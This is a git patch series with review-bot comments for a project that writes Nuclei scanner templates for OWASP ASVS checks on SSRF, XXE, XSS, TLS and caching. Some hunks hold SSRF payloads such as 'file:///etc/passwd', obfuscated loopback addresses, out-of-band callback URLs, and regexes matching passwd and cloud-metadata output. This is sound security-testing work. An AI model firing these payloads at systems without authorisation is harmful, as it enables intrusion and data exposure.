body + regex: + - '(\d.\d.\d)(.*?)mysql_native_password' + + - type: regex + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + part: body + words: + - 'for 16-bit app support' + + - type: regex + part: body + regex: + - 'dns-conf\/[\s\S]+instance\/' + + - type: regex + part: body + regex: + - 'app-id[\s\S]+placement\/' + + - type: regex + part: body + regex: + - 'ami-id[\s\S]+placement\/' + + - type: regex + part: body + regex: + - 'id[\s\S]+interfaces\/' \ No newline at end of file diff --git a/templates/dast/5.5.2.yaml b/templates/dast/5.5.2.yaml index 41cf1ee..353012c 100644 --- a/templates/dast/5.5.2.yaml +++ b/templates/dast/5.5.2.yaml @@ -10,7 +10,7 @@ info: - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xxe/generic-xxe.yaml - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection - tags: asvs,12.6.1 + tags: asvs,5.5.2 description: | Verify that the application correctly restricts XML parsers to only use the most restrictive configuration possible and to ensure that unsafe features such as resolving external entities are disabled to prevent XML eXternal Entity (XXE) attacks. From a5e2c4ed1c74289392130fd5c88c18285b471eac Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 25 Aug 2024 18:37:29 +0000 Subject: [PATCH 111/129] Fix 5.2.6.yaml --- templates/dast/5.2.6.yaml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/templates/dast/5.2.6.yaml b/templates/dast/5.2.6.yaml index 8eba52c..0158b63 100644 --- a/templates/dast/5.2.6.yaml +++ b/templates/dast/5.2.6.yaml @@ -1,4 +1,4 @@ -id: id: ASVS-4-0-3-V5-2-6 +id: ASVS-4-0-3-V5-2-6 info: name: ASVS 5.2.6 Check 
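Review bot: the new templates/dast/5.2.6.yaml opens with `id: id: ASVS-4-0-3-V5-2-6`, a doubled key that makes the template id invalid; the follow-up PATCH 111 corrects it, so squash that correction into this commit. Two more points on this hunk: the only Vulnerable-Pages reference is `https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/`, a 12.6.1 page in a 5.2.6 template, so either state that it is the intended test page or point at the matching one; and the dots in the regex `SSH-(\d.\d)-OpenSSH_(\d.\d)` are unescaped, so they match any character where `\d\.\d` was clearly meant. The unrelated 5.5.2.yaml tag fix (`asvs,12.6.1` to `asvs,5.5.2`) bundled into the same commit would be easier to trace as its own commit.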
@@ -10,7 +10,7 @@ info: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/response-ssrf.yaml - tags: asvs,5.2.6 + tags: asvs,5.2.6 description: | Verify that the application protects against SSRF attacks, by validating or sanitizing untrusted data or HTTP file metadata, such as filenames and URL input fields, and uses allow lists of protocols, domains, paths and ports. @@ -45,10 +45,8 @@ http: fuzz: - "{{ssrf}}" - - part: query + - part: body mode: single - values: - - "(https|http|file)(%3A%2F%2F|://)(.*?)" fuzz: - "{{ssrf}}" From 3d5cb3d4da9d56e21fda1cfc5217467fcbe9c349 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 25 Aug 2024 18:45:42 +0000 Subject: [PATCH 112/129] Fix 12.6.1.yaml --- templates/12.6.1.yaml | 124 +++++++++++------------------------------- 1 file changed, 33 insertions(+), 91 deletions(-) diff --git a/templates/12.6.1.yaml b/templates/12.6.1.yaml index bc6f561..1e1ce42 100644 --- a/templates/12.6.1.yaml +++ b/templates/12.6.1.yaml 
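Review bot: the new `- part: body` fuzzing rule in 5.2.6.yaml sits under the unchanged `pre-condition` `method == "GET"`, so it only runs on GET requests, which normally carry no body to fuzz; either extend the pre-condition to POST (and whatever content types the body rule should handle) or keep the query rule this replaces. The `values:` filter `(https|http|file)(%3A%2F%2F|://)(.*?)` that limited fuzzing to URL-shaped parameter values is dropped rather than carried over; keeping it on the body rule would focus the SSRF payloads on parameters that actually hold URLs instead of every parameter in the request.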
@@ -9,106 +9,48 @@ info: reference: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery - https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/blind-ssrf.yaml - https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html tags: asvs,12.6.1 description: | Verify that the web or application server is configured with an allow list of resources or systems to which the server can send requests or load data/files from. -variables: - whiltelist_host: "http://google.com" - server_file: "file:///etc/passwd" - restricted_path: "/admin" - restricted_path_keyword: "Welcom to Admin Panel" - -requests: - - raw: - - | - POST {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"url":"{{server_file}}"} - - stop-at-first-match: true - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - - - raw: - - | - POST {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"url":"http://{{interactsh-url}}"} - - - | - POST {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"url":"{{whiltelist_host}}.{{interactsh-url}}"} - - - | - POST {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"url":"{{whiltelist_host}}@{{interactsh-url}}"} - - - | - POST {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"url":"http://{{interactsh-url}}#{{whiltelist_host}}"} - - stop-at-first-match: true - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - - - raw: - - | - POST {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"url":"http://{{localips}}/admin"} +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' payloads: - 
localips: - - '0000:0000:0000:0000:0000:ffff:127.0.0.1' - - '0000:0000:0000:0000:0000:ffff:7f000001' - - '0177.0.0.01' - - '0177.0.0.1' - - '0177.0.1' - - '0177.0x0.1' - - '0177.1' - - '017700000001' - - '0:0:0:0:0:ffff:7f000001' - - '0x000000007f.0x000000000.0x000000000.0x000000001' - - '0x7f.0.0.1' - - '0x7f.0.1' - - '0x7f.0x0.0.1' - - '0x7f.0x0.0x0.0x1' - - '0x7f.0x0.0x0.1' - - '0x7f.0x0.1' - - '0x7f.1' - - '0x7f000001' - - '127.0.0.01' - - '127.0.0.0x1' - - '127.0.0x0.0x1' - - '127.0x0.0x0.0x1' - - '2130706433' + ssrf: + - "{{interactsh-url}}" + - "{{FQDN}}.{{interactsh-url}}" + - "{{RDN}}.{{interactsh-url}}" + - "{{FQDN}}@{{interactsh-url}}" + - "{{RDN}}@{{interactsh-url}}" + + fuzzing: + - part: query + mode: single + fuzz: + - "https://{{ssrf}}" + - "{{ssrf}}:80" + + - part: body + mode: single + fuzz: + - "https://{{ssrf}}" + - "{{ssrf}}:80" + + - part: header + mode: single + fuzz: + - "https://{{ssrf}}" + - "{{ssrf}}:80" stop-at-first-match: true matchers: - - type: word + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "{{restricted_path_keyword}}" \ No newline at end of file + - "http" \ No newline at end of file From b9f8dbe49a5f9ff10603f916917d87062ce028e6 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 25 Aug 2024 18:46:24 +0000 Subject: [PATCH 113/129] Update 12.6.1.yaml --- templates/12.6.1.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates/12.6.1.yaml b/templates/12.6.1.yaml index 1e1ce42..13d6802 100644 --- a/templates/12.6.1.yaml +++ b/templates/12.6.1.yaml @@ -53,4 +53,5 @@ http: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" \ No newline at end of file + - "http" + - "dns" \ No newline at end of file From bb16b2ef1ea536f46a7134922ab93943822316cd Mon Sep 17 00:00:00 2001 
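Review bot: the commit subject says "Fix 12.6.1.yaml", but this hunk replaces the template wholesale, dropping the `server_file` (`file:///etc/passwd`), `localips` and `restricted_path` checks in favour of out-of-band detection through `interactsh-url` only; please say so in the commit message and in `description`, since a reader of the history will otherwise assume the local-target checks still exist. Two further points: the single matcher is `part: interactsh_protocol` with `words: - "http"`, so an interaction that only reaches DNS resolution is missed (PATCH 113 adds `"dns"` immediately afterwards and should be squashed in here); and the file now uses `fuzzing:` but stays at `templates/12.6.1.yaml`, while the other fuzzing templates in this series (5.2.6, 5.5.2, 12.3.3) live under `templates/dast/`, so move it for consistency with how the repository separates DAST templates.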
From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 10:50:26 +0330 Subject: [PATCH 114/129] Update 5.1.5.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/5.1.5.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/5.1.5.yaml b/templates/5.1.5.yaml index 0942052..6c073bd 100644 --- a/templates/5.1.5.yaml +++ b/templates/5.1.5.yaml @@ -9,7 +9,7 @@ info: reference: - https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html - https://cwe.mitre.org/data/definitions/601.html - - https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/04-Testing_for_Client_Side_URL_Redirect + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/11-Client_Side_Testing/04-Testing_for_Client_Side_URL_Redirect - https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/generic/open-redirect-generic.yaml - https://snbig.github.io/Vulnerable-Pages/ASVS_5_1_5/ tags: asvs,5.1.5 From c87ba323bf9cc4461cf8c7e8617a6c9141a8838f Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 10:51:50 +0330 Subject: [PATCH 115/129] Update 5.2.6.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/dast/5.2.6.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates/dast/5.2.6.yaml b/templates/dast/5.2.6.yaml index 0158b63..3fcfda5 100644 --- a/templates/dast/5.2.6.yaml +++ b/templates/dast/5.2.6.yaml 
@@ -10,6 +10,7 @@ info: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/response-ssrf.yaml + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ tags: asvs,5.2.6 description: | Verify that the application protects against SSRF attacks, by validating or sanitizing untrusted data or HTTP file metadata, such as filenames and URL input fields, and uses allow lists of protocols, domains, paths and ports. @@ -102,4 +103,4 @@ http: - type: regex part: body regex: - - 'id[\s\S]+interfaces\/' \ No newline at end of file + - 'id[\s\S]+interfaces\/' From 3ef5e1b82e2038962293adc9602e55956a847778 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 10:55:47 +0330 Subject: [PATCH 116/129] Update 5.2.6.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/dast/5.2.6.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/dast/5.2.6.yaml b/templates/dast/5.2.6.yaml index 3fcfda5..48d7186 100644 --- a/templates/dast/5.2.6.yaml +++ b/templates/dast/5.2.6.yaml 
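Review bot: the added `- https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/` in 5.2.6.yaml duplicates the entry two lines above it in the same `reference:` list, and PATCH 116 only re-indents the duplicate rather than removing it; drop the added line, or if a 5.2.6-specific test page was meant, point the new entry at that page. The trailing-newline fix in the second hunk is fine.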
@@ -10,7 +10,7 @@ info: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/response-ssrf.yaml - - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ tags: asvs,5.2.6 description: | Verify that the application protects against SSRF attacks, by validating or sanitizing untrusted data or HTTP file metadata, such as filenames and URL input fields, and uses allow lists of protocols, domains, paths and ports. From fab12ba616d90efafd9f7a255c117b4c6a6d36b2 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 10:57:18 +0330 Subject: [PATCH 117/129] Update 5.3.3.2.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/dast/5.3.3.2.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates/dast/5.3.3.2.yaml b/templates/dast/5.3.3.2.yaml index fd92174..55f1434 100644 --- a/templates/dast/5.3.3.2.yaml +++ b/templates/dast/5.3.3.2.yaml @@ -10,6 +10,7 @@ info: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xss/reflected-xss.yaml + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ tags: asvs,5.3.3 description: | Verify that context-aware, preferably automated - or at worst, manual - output escaping protects against reflected, stored, and DOM based XSS. ([C4](https://owasp.org/www-project-proactive-controls/#div-numbering)) 
@@ -53,4 +54,4 @@ http: - type: word part: header words: - - "text/html" \ No newline at end of file + - "text/html" From 8c86190235e44340c818f02dfbabdda86ba1c097 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 10:57:40 +0330 Subject: [PATCH 118/129] Update 5.3.3.2.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/dast/5.3.3.2.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/templates/dast/5.3.3.2.yaml b/templates/dast/5.3.3.2.yaml index 55f1434..a8d0005 100644 --- a/templates/dast/5.3.3.2.yaml +++ b/templates/dast/5.3.3.2.yaml @@ -10,7 +10,6 @@ info: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xss/reflected-xss.yaml - - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ tags: asvs,5.3.3 description: | Verify that context-aware, preferably automated - or at worst, manual - output escaping protects against reflected, stored, and DOM based XSS. ([C4](https://owasp.org/www-project-proactive-controls/#div-numbering)) From 392f4acd12fe360e2ad6dbd9912b8d7415d3af29 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 10:58:28 +0330 Subject: [PATCH 119/129] Update 5.5.2.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/dast/5.5.2.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates/dast/5.5.2.yaml b/templates/dast/5.5.2.yaml index 353012c..13f7fe5 100644 --- a/templates/dast/5.5.2.yaml +++ b/templates/dast/5.5.2.yaml 
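Review bot: PATCH 117 adds `- https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/` to the `reference:` list in 5.3.3.2.yaml even though the identical URL is already two lines above it, and PATCH 118 removes it again; the pair nets to nothing but the trailing-newline fix in 117's second hunk, so squash the two into one commit that only adds the missing newline.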
@@ -9,7 +9,7 @@ info: reference: - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xxe/generic-xxe.yaml - - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection tags: asvs,5.5.2 description: | Verify that the application correctly restricts XML parsers to only use the most restrictive configuration possible and to ensure that unsafe features such as resolving external entities are disabled to prevent XML eXternal Entity (XXE) attacks. @@ -59,4 +59,4 @@ http: - type: word part: interactsh_protocol words: - - "http" \ No newline at end of file + - "http" From 19fd6434266cd4cd78ce26064d17896d5d9a31ba Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 1 Sep 2024 08:40:08 +0000 Subject: [PATCH 120/129] Add 12.1.1, 12,3,3, 12,6,1, 5.1.5, 5.3.3 Vulnerable pages --- .gitmodules | 2 +- Vulnerable-Pages | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/.gitmodules b/.gitmodules index 18feab8..62cddbf 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,4 +1,4 @@ [submodule "Vulnerable-Pages"] path = Vulnerable-Pages url = https://github.com/Snbig/Vulnerable-Pages - branch = dev + branch = main diff --git a/Vulnerable-Pages b/Vulnerable-Pages index 7457167..9f6162f 160000 --- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit 74571678dbdfb39620454cde42d2054eb2a858db +Subproject commit 9f6162ffc8b63d2a3eee3c8c68612e92ebc6283d From d31b5f31be19710c916c5b71a7234c547f85b6e6 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 12:11:16 +0330 Subject: [PATCH 121/129] Update 8.2.1.yaml 
Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/8.2.1.yaml | 49 ++------------------------------------------ 1 file changed, 2 insertions(+), 47 deletions(-) diff --git a/templates/8.2.1.yaml b/templates/8.2.1.yaml index 0ec2564..83002bb 100644 --- a/templates/8.2.1.yaml +++ b/templates/8.2.1.yaml @@ -3,7 +3,7 @@ id: ASVS-4-0-3-V8-2-1 info: name: ASVS 8.2.1 Check author: AmirHossein Raeisi - severity: low + severity: info classification: cwe-id: CWE-525 reference: @@ -16,46 +16,7 @@ info: http: - method: GET path: - - "{{BaseURL}}{{sensitive_path}}" - payloads: - sensitive_path: - - "/" - - "/login" - - "/logout" - - "/register" - - "/dashboard" - - "/profile" - - "/settings" - - "/account" - - "/admin" - - "/user" - - "/users" - - "/search" - - "/messages" - - "/notifications" - - "/help" - - "/support" - - "/contact" - - "/about" - - "/privacy" - - "/terms" - - "/docs" - - "/api" - - "/api/v1" - - "/api/v2" - - "/home" - - "/welcome" - - "/password-reset" - - "/forgot-password" - - "/update-profile" - - "/billing" - - "/invoices" - - "/orders" - - "/cart" - - "/checkout" - - "/confirmation" - - "/history" - - "/activities" + - "{{BaseURL}}" matchers-condition: and stop-at-first-match: true @@ -65,9 +26,3 @@ http: regex: - '(?i)cache-control:.*no-store' negative: true - - - type: status - status: - - 200 - - 301 - - 302 \ No newline at end of file From 45eea9d3897d76aa64f1811fc3eda773081fcfd0 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 12:16:51 +0330 Subject: [PATCH 122/129] Update 9.1.2.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/9.1.2.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates/9.1.2.yaml b/templates/9.1.2.yaml index ef748c2..5170641 100644 --- a/templates/9.1.2.yaml +++ b/templates/9.1.2.yaml 
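Review bot: with the `sensitive_path` payload list removed, 8.2.1.yaml now requests only `{{BaseURL}}`, and the sole remaining matcher is `negative: true` on `(?i)cache-control:.*no-store`, so any site whose landing page lacks `no-store` is reported although the check (CWE-525, sensitive data in the browser cache) is only meaningful for pages that carry sensitive data; expect false positives on public pages, and note `matchers-condition: and` now governs a single matcher. Dropping the `status` matcher (200/301/302) also lets error responses and redirects without a Cache-Control header match; keep at least a `status: 200` check, or state in `description` that the template should be aimed at authenticated endpoints. Lowering `severity` to `info` is consistent with the reduced precision, but the reason belongs in the commit message.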
@@ -9,6 +9,8 @@ info: reference: - https://www.acunetix.com/vulnerabilities/web/tls-ssl-weak-cipher-suites/ - https://github.com/projectdiscovery/nuclei-templates/blob/main/ssl/insecure-cipher-suite-detect.yaml + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security + - https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Security_Cheat_Sheet.html tags: asvs,9.1.2 description: | Verify using up to date TLS testing tools that only strong cipher suites are enabled, with the strongest cipher suites set as preferred. @@ -420,4 +422,4 @@ ssl: - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" - "TLS_KRB5_WITH_RC4_128_SHA" - "TLS_RSA_WITH_NULL_SHA" - condition: or \ No newline at end of file + condition: or From 3a3a40b442ab0e9bc25e14bcf47241016af3f6c2 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 12:18:09 +0330 Subject: [PATCH 123/129] Update 12.3.3.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/dast/12.3.3.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates/dast/12.3.3.yaml b/templates/dast/12.3.3.yaml index cd40bb0..2d92495 100644 --- a/templates/dast/12.3.3.yaml +++ b/templates/dast/12.3.3.yaml @@ -9,6 +9,7 @@ info: reference: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/ tags: asvs,12.3.3 @@ -43,4 +44,4 @@ http: part: interactsh_protocol words: - "http" - - "dns" \ No newline at end of file + - "dns" 
From d8038b7714f9d75fed30f7af0f06941df5c13899 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 12:19:18 +0330 Subject: [PATCH 124/129] Update 12.6.1.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/12.6.1.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates/12.6.1.yaml b/templates/12.6.1.yaml index 13d6802..df170e0 100644 --- a/templates/12.6.1.yaml +++ b/templates/12.6.1.yaml @@ -11,6 +11,7 @@ info: - https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/ - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/blind-ssrf.yaml - https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ tags: asvs,12.6.1 description: | Verify that the web or application server is configured with an allow list of resources or systems to which the server can send requests or load data/files from. @@ -54,4 +55,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - "dns" \ No newline at end of file + - "dns" From 8cd61df11afed283326241b8e41328b4adfecfcd Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 11 Sep 2024 15:41:13 +0330 Subject: [PATCH 125/129] Ajibe --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 5c93c84..08d84bb 100644 --- a/README.md +++ b/README.md @@ -32,3 +32,4 @@ For detailed information and guidelines about contributing in developing templat The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) + From 61061d5fc32c1d64e5eb8997709ec7b7f7a6c00e Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 11 Sep 2024 15:41:13 +0330 Subject: [PATCH 126/129] Ajibe --- README.md | 1 + 1 file changed, 1 insertion(+) 
diff --git a/README.md b/README.md index 5c93c84..08d84bb 100644 --- a/README.md +++ b/README.md @@ -32,3 +32,4 @@ For detailed information and guidelines about contributing in developing templat The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) + From e9c7d3395593bdb3559b9e012a0ba85d1aefb7cf Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 11 Sep 2024 15:47:13 +0330 Subject: [PATCH 127/129] Fixed --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index 08d84bb..5c93c84 100644 --- a/README.md +++ b/README.md @@ -32,4 +32,3 @@ For detailed information and guidelines about contributing in developing templat The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) - From 2800ca25ef55df0e2377f474c6d64cf199765afa Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 11 Sep 2024 15:47:13 +0330 Subject: [PATCH 128/129] Fixed --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index 08d84bb..5c93c84 100644 --- a/README.md +++ b/README.md @@ -32,4 +32,3 @@ For detailed information and guidelines about contributing in developing templat The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) - From dc4899f6ae1b1b349721edf3a589ad6f8b60b8ea Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 11 Sep 2024 15:56:15 +0330 Subject: [PATCH 129/129] Chore: Fix Late night --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index 5c93c84..a51d7a9 100644 --- a/README.md +++ b/README.md @@ -31,4 +31,3 @@ For detailed information and guidelines about contributing in developing templat #### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) -
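Review bot: PATCH 125 and PATCH 126 are byte-identical (same author, same timestamp 15:41:13, same README.md hunk adding a blank line after the core-team entry), PATCH 127 and PATCH 128 are likewise identical (15:47:13, removing that blank line), and PATCH 129 then deletes the remaining blank line after the entry; the five commits net to one removed blank line and look like a rebase artifact, so squash them into a single commit with a message that says what changed.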